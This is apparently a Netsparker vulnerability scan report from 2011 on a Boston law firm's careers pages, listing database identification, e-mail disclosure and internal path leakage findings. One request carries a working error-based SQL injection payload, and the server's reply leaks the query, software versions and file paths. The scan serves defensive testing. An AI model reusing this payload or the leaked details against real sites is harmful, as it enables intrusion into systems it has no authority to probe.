<span>Copyright © 2011 Nutter McClennen & Fish LLP. All rights reserved.</span> <span>Boston, Massachusetts, USA 617.439.2000 | Hyannis 508.790.5400</span> <span id="footerLinks">See DISCLAIMER on front page | <a href="http://www.nutter.com/sitemap.php" title="Site Map">Site Map</a></span> <span id="footerSite">www.nutter.com</span> </div> <!-- footer end --> </div> </body> </html> <!-- careers end -->
MySQL Database Identified
MySQL Database Identified
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.
Impact
This issue is reported as additional information only, there is no direct impact arising from this issue.
Request
GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17&SectionID=380 HTTP/1.1 Referer: http://www.nutter.com/careers.php?CategoryID=23 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:12:17 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Careers : Nutter McClennen & Fish LLP--> <title>Careers : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>50</b><br />error: Duplicate entry '_!@4dilemma:0' for key 1 | 1062<BR>sql: SELECT CategoryName FROM _categories WHERE IsActive='y' AND CategoryID=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) LIMIT 1<br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>75</b><br /><ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.221.jpg" width="450" height="124" id="smallImage"><h2></h2><ul id="categoryNav"><li><a href="javascript:void(0)" title="Law Students">Law Students</a> <ul> <li class="Top"><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=3&subID=1" title="Summer Associate Program">Summer Associate Program</a></li> <li><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=4&subID=1" title="Fall Recruiting">Fall Recruiting</a></li> </ul> </li><li><a href="http://www.nutter.com/careers.php?CategoryID=23" title="Laterals" class="Left">Laterals</a><li><a href="http://www.nutter.com/careers.php?CategoryID=24" title="Administrative Staff" class="Left">Administrative Staff</a> </ul> <div id="subNav" class="Raised" style="cursor: default;"><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="margin-top: 15px; margin-left: 11px; border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a><br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><div id="NarrativeText"><p><a href="/media/news/media.669.pdf" target="_blank"><strong>Nutter Ranks #1 Nationally for Associate Satisfaction for Third Consecutive Year</strong></a></p>If you want a challenging and supportive environment in which to advance your career, then we invite you to explore joining Nutter.<br /><br />For Associate or Technical Specialists opportunities, please contact:<br /><p>Terese Cunningham, Director of Legal Recruitment<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />Email: <a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a><br />Phone: 617-439-2351<br /></p><p>For Partnership opportunities, please contact: <br /></p><p>James E. Dawson, Esq.<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />E-mail:<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a><br />Phone: 617-439-2623 <br /></p></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Careers : Nutter McClennen & Fish LLP</span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')" onmouseout="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')"><img src="http://www.nutter.com/media/leftNav/careers_over.gif" name="careers" alt="CAREERS"/></a><a href="http://www.nutter.com/offices.php" title="OFFICES" onmouseover="rollover('offices', 'http://www.nutter.com/media/leftNav/offices_over.gif')" onmouseout="rollover('offices', 'http://www.nutter.com/media/leftNav/offices.gif')"><img src="http://www.nutter.com/media/leftNav/offices.gif" name="offices" alt="OFFICES"/></a><a href="http://www.nutter.com/client_services.php?SectionID=2" title="NUTTER INVESTMENT ADVISORS" onmouseover="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors_over.gif')" onmouseout="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors.gif')"><img src="http://www.nutter.com/media/leftNav/advisors.gif" name="advisors" alt="NUTTER INVESTMENT ADVISORS"/></a> </div></div><!-- body end --> <!--- sIFR script ---><script type="text/javascript">//<![CDATA[// Load the sIFR font for the feed's title.if(typeof sIFR == "function"){ sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"./_sifr/century.swf", sColor:"#244185", sHoverColor:"#666666", sBgColor:"#ffffff", sFlashVars..
E-mail Address Disclosure
E-mail Address Disclosure
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
tcunningham@nutter.com jdawson@nutter.com
Request
GET /careers.php?CategoryID=23 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:09:54 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Laterals : Careers : Nutter McClennen & Fish LLP--> <title>Laterals : Careers : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.221.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.362.gif" border="0" title="" alt=""></h2><ul id="categoryNav"><li><a href="javascript:void(0)" title="Law Students">Law Students</a> <ul> <li class="Top"><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=3&subID=1" title="Summer Associate Program">Summer Associate Program</a></li> <li><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=4&subID=1" title="Fall Recruiting">Fall Recruiting</a></li> </ul> </li><li><a href="http://www.nutter.com/careers.php?CategoryID=23" title="Laterals" class="Left" id="hilited">Laterals</a><li><a href="http://www.nutter.com/careers.php?CategoryID=24" title="Administrative Staff" class="Left">Administrative Staff</a> </ul> <div id="subNav" class="Raised"> <h3><img src="/media/aboutus/media.343.gif" border="0" title="" alt=""></h3> <ul> <li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=17&SectionID=380" title="Overview">Overview</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=5&SectionID=378" title="Open Positions">Open Positions</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=7&SectionID=367" title="Diversity">Diversity</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=8&SectionID=384" title="Nutter's Clients">Nutter's Clients</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=9&SectionID=382" title="Pro Bono & Community Service">Pro Bono & Community Service</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=10&SectionID=361" title="Training & Mentoring">Training & Mentoring</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=11&SectionID=374" title="Benefits">Benefits</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=19&SectionID=1041" title="AmLaw Mid-Level Associates Survey">AmLaw Mid-Level Associates Survey</a></li> </ul><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0" style="margin-top: 15px; margin-left: 8px;"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a> <br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><div id="NarrativeText"><p><a href="/media/news/media.669.pdf" target="_blank"><strong>Nutter Ranks #1 Nationally for Associate Satisfaction for Third Consecutive Year</strong></a></p>If you want a challenging and supportive environment in which to advance your career, then we invite you to explore joining Nutter.<br /><br />For Associate or Technical Specialists opportunities, please contact:<br /><p>Terese Cunningham, Director of Legal Recruitment<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />Email: <a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a><br />Phone: 617-439-2351<br /></p><p>For Partnership opportunities, please contact: <br /></p><p>James E. Dawson, Esq.<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />E-mail:<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a><br />Phone: 617-439-2623 <br /></p></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Laterals : Careers : Nutter McClennen & Fish LLP</span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')" onmouseout="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')"><img src="http://www.nutter.com/media/leftNav/careers_over.gif" name="careers" alt="CAREERS"/></a><a href="http://www.nutter.com/offices.php" title="OFFICES" onmouseover="roll..
[Possible] Internal Path Leakage (*nix)
[Possible] Internal Path Leakage (*nix)
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.
Error messages should be disabled.
Remove this kind of private data from the output.
External References
/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php /usr/local/apache/htdocs/_templates/templates.careers.php
Request
